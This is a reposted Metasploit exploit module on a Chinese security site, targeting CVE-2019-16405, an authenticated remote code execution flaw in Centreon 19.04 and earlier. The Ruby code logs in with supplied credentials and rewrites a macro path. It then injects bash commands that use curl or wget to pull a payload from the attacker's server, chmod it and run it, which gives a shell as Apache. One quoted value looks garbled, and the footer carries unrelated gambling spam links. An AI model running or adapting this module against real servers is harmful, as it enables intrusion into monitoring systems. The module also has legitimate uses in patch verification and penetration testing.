首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>Exploits>文章內容
Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)
來源:metasploit.com 作者:TheCyberGeek 發布時間:2020-01-22  
####################################################################
# This module requires Metasploit: https://metasploit.com/download #
#  Current source: https://github.com/rapid7/metasploit-framework  #
####################################################################

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
        "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution",
        "Description" =>  %q{
          Authenticated Remote Code Execution on Centreon Web Appliances.
          Affected versions: =< 18.10, 19.04
          By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache.
          Vendor verified: 09/17/2019
          Vendor patched: 10/16/2019
          Public disclosure: 10/18/2019
        },
        "License" => MSF_LICENSE,
        'Author' => [
          'TheCyberGeek', # Discovery
          'enjloezz' # Discovery and Metasploit Module
        ],
        'References' =>
        [
            ['URL','https://github.com/centreon/centreon/pull/7864'],
            ['CVE','2019-16405']
        ],
        "Platform" => "linux",
        "Targets" => [
          ["Centreon", {}],
        ],
        "Stance" => Msf::Exploit::Stance::Aggressive,
        "Privileged" => false,
        "DisclosureDate" => "Oct 19 2019",
        "DefaultOptions" => {
          "SRVPORT" => 80,
        },
        "DefaultTarget" => 0
      ))

    register_options(
      [
        OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
        OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
        OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
        OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]),
        OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
      ]
    )
  end

  def exploit
    begin
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "index.php"),
        "method" => "GET",
      )
      @phpsessid = res.get_cookies
      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body

      unless token
        vprint_error("Couldn't get token, check your TARGETURI")
        return
      end
      res = send_request_cgi!(
      "uri" => normalize_uri(target_uri.path, "index.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_post" => {
        "useralias" => datastore["USERNAME"],
        "password" => datastore["PASSWORD"],
        "centreon_token" => token,
        },
      )
      unless res.body.include? "You need to enable JavaScript to run this app"
        fail_with Failure::NoAccess "Cannot login to Centreon"
      end
      print_good("Login Successful!")
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "main.get.php"),
        "method" => "GET",
        "cookie" => @phpsessid,
        "vars_get" => {
          "p" => "60904",
          "o" => "c",
          "resource_id" => 1,
        },
      )
      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "main.get.php"),
        "vars_get" => {
          "p" => "60904",
          },
        "method" => "POST",
        "cookie" => @phpsessid,
        "vars_post" => {
          "resource_name": "$USER1___FCKpd___0quot;,
          "resource_line": "/",
          "instance_id": 1,
          "resource_activate": 1,
          "resource_comment": "Nagios Plugins Path",
          "submitC": "Save",
          "resource_id": 1,
          "o": "c",
          "initialValues": "" "a:0:{}" "",
          "centreon_token": token
        },
      )
      begin
        Timeout.timeout(datastore["HTTPDELAY"]) { super }
      rescue Timeout::Error
        vprint_error("Server Timed Out...")
      end
    rescue ::Rex::ConnectionError
      vprint_error("Connection error...")
    end
  end

  def primer
    @pl = generate_payload_exe
    @path = service.resources.keys[0]
    binding_ip = srvhost_addr

    proto = ssl ? "https" : "http"
    payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
    send_payload(payload_uri)
  end

  def send_payload(payload_uri)
    payload = "/bin/bash -c \"" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\""
    print_good("Sending Payload")
    send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
    )
  end

  def on_request_uri(cli, req)
    print_good("#{peer} - Payload request received: #{req.uri}")
    send_response(cli, @pl)
    run_shell
    stop_service
  end

  def run_shell
    print_good("Setting permissions for the payload")
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"",
        "o": "p",
        "min": 1,
      },
    )

    print_good("Executing Payload")
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/tmp/#{@path}",
        "o": "p",
        "min": 1,
      },
    )
  end
end
            

 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相關文章
·Plantronics Hub 3.13.2 - Spoke
·NEOWISE CARBONFTP 1.4 - Weak P
·Vtiger CRM 7.1.0 Remote Code E
·Ayukov NFTP FTP Client 2.0 Buf
·EZ CD Audio Converter 8.0.7 De
·NetworkSleuth 3.0.0.0 Denial O
·NBMonitor Network Bandwidth Mo
·Hashicorp Consul Rexec Remote
·Hashicorp Consul Services API
·WebKit JSC AbstractValue::set
·WebKit JSC JSArray::shiftCount
·Terminal Services Manager 3.1
  推薦廣告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved
35选7杀号技巧 江苏省体彩七位数走势图30期 幸运飞艇庄家如何作弊 北京快3助手下载安装 11选5黄金一胆 吉林十一选五开奖一定牛遗漏 股票配资系统 上海时时乐历史开奖号 湖北快3带线走势图 中国股票配资网 重庆快乐10分走势